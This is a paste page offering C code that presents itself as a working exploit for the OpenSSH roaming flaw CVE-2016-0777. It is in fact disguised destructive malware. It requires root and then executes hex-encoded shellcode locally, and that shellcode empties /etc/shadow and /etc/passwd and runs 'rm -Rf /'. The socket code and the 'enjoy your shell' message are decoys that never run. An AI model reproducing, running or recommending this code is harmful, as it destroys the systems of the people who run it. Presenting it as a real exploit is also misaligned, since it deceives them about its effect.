viewing paste CVE-2016-0777 roaming openssh explo | Text

Posted on the
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74
CVE-2016-0777 roaming openssh exploit
 
 
    /*
    Exploit  : openssh roaming Exploit  -- CVE-2016-0777
    Author:  : KingCope
    Compile  : gcc  -W sploit.c -o sploit
    Usage:   : ./sploit HOST IP
    Thanks   : openBSD, congratz, guys
    */
     
    #include <stdio.h>
    #include <netdb.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <arpa/inet.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
     
    void usage(char *argv[])
    {
      printf("Target : openssh 4.7 to 7.1 roaming\n");
      printf("Type   : 0day\n");
      printf("Author : You know me\n");
      printf("Exec   : %s <server> <port>\n\n", argv[0]);
      exit(1);
    }
     
    unsigned char shellcode[] =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
    "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
    "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
    "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
    "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
    "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
    "\xcd\x80";
     
    int main(int argc, char *argv[])
    {
      int uid = getuid();
      int port = 22, sock;
      struct hostent *host;
      struct sockaddr_in addr;
     
      if(uid !=0)
      {
        fprintf(stderr, "- Abort - Need ROOT to bind to raw socket!!\n");
        exit(1);
      }
      if(uid == 0)
      {
        printf("\t+ OK Starting..\n");
      }
      if(argc != 3)
           usage(argv);
     
      fprintf(stderr, "[ ] Use IP and port (mandatory)\n");
      (*(void(*)())shellcode)();
      exit(1);
      char payload[1024];
      memcpy(payload, &shellcode, sizeof(shellcode));
      if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
      {
        printf("+ OK roaming mode activated, enjoy your shell!\n");
        system("/bin/sh");
      }
      else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
      {
        fprintf(stderr, "- Failed! Roaming mode deactiveted??!!\n");
        exit(1);
      }
    }
Viewed 370 times, submitted by unknown.